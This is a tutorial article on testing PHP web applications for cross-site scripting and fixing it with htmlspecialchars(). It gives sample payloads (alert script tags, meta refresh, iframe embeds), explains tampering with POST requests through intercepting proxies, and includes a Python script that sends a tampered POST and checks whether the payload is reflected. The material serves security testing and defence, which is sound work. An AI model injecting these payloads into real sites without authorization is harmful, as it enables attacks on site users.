This article looks at cross-site scripting (XSS) in Web applications: the risk an XSS hole poses to a Web application, how attackers carry out XSS with JavaScript, how to test an application for such holes, and how to close them.

Common XSS attack methods
XSS attacks are usually carried out with JavaScript, for example by popping up a dialog box: <script>alert("XSS");</script>
XSS can also be carried out with other HTML tags, which is just as dangerous, for example:
Forcing the page to refresh or redirect: <meta http-equiv="refresh" content="0;"> (a URL after the semicolon sends the victim to another page)
Embedding another site's content in the page: <iframe src=http://xxxx width=250 height=250></iframe>
The XSS (Cross Site Scripting) Cheat Sheet lists a large number of XSS attack strings and is a very useful reference for XSS testing of Web applications; it also discusses how such strings can be filtered. A tester can take strings from the list, submit them to the application under test, and observe whether the application is vulnerable to XSS.
Testing tools
XSS testing usually means tampering with the Get/Post parameters of a request: instead of the values the form expects, the tester inserts JavaScript into the parameters and watches how the server handles them. The following tools can intercept and modify HTTP requests:
Paros proxy (http://www.parosproxy.org)
Fiddler (http://www.fiddlertool.com/fiddler)
Burp proxy (http://www.portswigger.net/proxy/)
TamperIE (http://www.bayden.com/dl/TamperIESetup.exe)
This article uses TamperIE for its Web testing examples. TamperIE is small and simple: it integrates into IE, lets you modify Get/Post requests, and supports SSL. If you combine TamperIE with IE7, note that IE7 enables IPv6 by default; if the Web server under test does not handle IPv6 connections properly, use TamperIE with IE6 instead.
As Figure 2 shows, TamperIE sidesteps the page's client-side JavaScript validation: it intercepts the POST request before it leaves the browser, and the tester can modify the submitted parameters, here name and message. For example, set message to "<script>alert("XSS hole!!");</script>" and click "Send altered data" to forward the tampered request to the Web server.

Figure 2. Modifying a Post request with TamperIE
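The same tampered POST can be produced without a browser at all, which is the point TamperIE makes: client-side JavaScript validation never runs when the request is built directly, so the server only ever sees the bytes in the body. The following script is an added example and not code from the original article; the field names name and message are the ones the article uses, while the target URL and the two sample server responses are constructed here for the demonstration. After sending the payload, the tester's real question is whether it came back raw or escaped, so the script also classifies the reflection.

```python
"""Replay the tampered POST from the TamperIE step as a script, then decide
whether the reflected payload came back raw or escaped.  Added example, not
code from the original article; TARGET and the two sample responses are
constructed for the demonstration."""
import html
import urllib.parse
import urllib.request

PAYLOAD = '<script>alert("XSS hole!!");</script>'
TARGET = "http://127.0.0.1:8080/guestbook.php"   # assumed target, not from the article

# Constructed responses standing in for the server: one echoes the message
# verbatim, the other passed it through htmlspecialchars() first.
VULNERABLE_RESPONSE = ('<html><body><p>From tester:</p><p>'
                       '<script>alert("XSS hole!!");</script></p></body></html>')
FIXED_RESPONSE = ('<html><body><p>From tester:</p><p>'
                  '&lt;script&gt;alert(&quot;XSS hole!!&quot;);&lt;/script&gt;'
                  '</p></body></html>')


def build_tampered_post(url, fields):
    """Build the POST directly.  No client-side validation runs here, which is
    what TamperIE achieves inside the browser: the server gets the raw body."""
    body = urllib.parse.urlencode(fields).encode("utf-8")
    return urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})


def classify_reflection(response_body, payload):
    """'raw' if the payload is echoed verbatim (an XSS hole), 'escaped' if it
    comes back as HTML entities, 'absent' if it is not reflected at all."""
    if payload in response_body:
        return "raw"
    if html.escape(payload, quote=True) in response_body:
        return "escaped"
    return "absent"


def send_and_classify(req, payload=PAYLOAD):
    """Send the request to a live target and classify the reflection."""
    with urllib.request.urlopen(req, timeout=10) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, "replace")
    return classify_reflection(body, payload)


if __name__ == "__main__":
    req = build_tampered_post(TARGET, {"name": "tester", "message": PAYLOAD})
    print("request body:", req.data.decode())
    for label, body in (("vulnerable", VULNERABLE_RESPONSE), ("fixed", FIXED_RESPONSE)):
        print(label, "->", classify_reflection(body, PAYLOAD))
    try:
        print("live target ->", send_and_classify(req))
    except OSError as exc:   # no server behind the assumed TARGET
        print("live target not reachable:", exc)
```

Python's html.escape writes a single quote as &#x27; while PHP's htmlspecialchars() writes &#039;, so for payloads that contain a single quote compare the response against both forms before concluding the output was escaped.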

Locating the vulnerable code
Input supplied by an attacker becomes dangerous at the moment the application writes it back into a page without filtering it: the browser then treats the injected HTML or JavaScript as part of the page. The places to examine are therefore the statements that produce dynamic HTML output. In a PHP Web application, search the source for "echo", "print", "printf" and "<?=" statements, and check whether the data each one outputs has been passed through PHP's htmlspecialchars() function, which converts the five HTML special characters into HTML entities. Output statements that write unfiltered data are potential XSS holes, whether that data is stored and shown later (persistent XSS) or reflected straight back from the current request (non-persistent XSS).
Filtering HTML special characters with PHP's htmlspecialchars()
To fix an XSS hole, the application has to deal with the characters that have a special meaning in HTML, such as "<" and ">". The characters < > & " ' all carry meaning in HTML and JavaScript; when they appear in user input and are written into a page unchanged, the browser interprets them as markup rather than displaying them as text. They therefore have to be converted into a harmless form before output.
An HTML entity starts with & and ends with ;, with either an entity name or # followed by the character's numeric code in between. A few characters have no named entity that every browser accepts; the single quote is one of them, which is why it is written in numeric form.

PHP's htmlspecialchars() converts HTML special characters into HTML entities. Because these characters have a special meaning in HTML, they must be turned into entities if they are to be displayed literally instead of being interpreted as markup. htmlspecialchars() performs the following conversions:
& is converted to &amp;
" is converted to &quot;
< is converted to &lt;
> is converted to &gt;
' is converted to &#039; (only when the ENT_QUOTES flag is passed; before PHP 8.1 the default, ENT_COMPAT, leaves single quotes alone, so code that relies on the default remains exposed inside single-quoted attributes)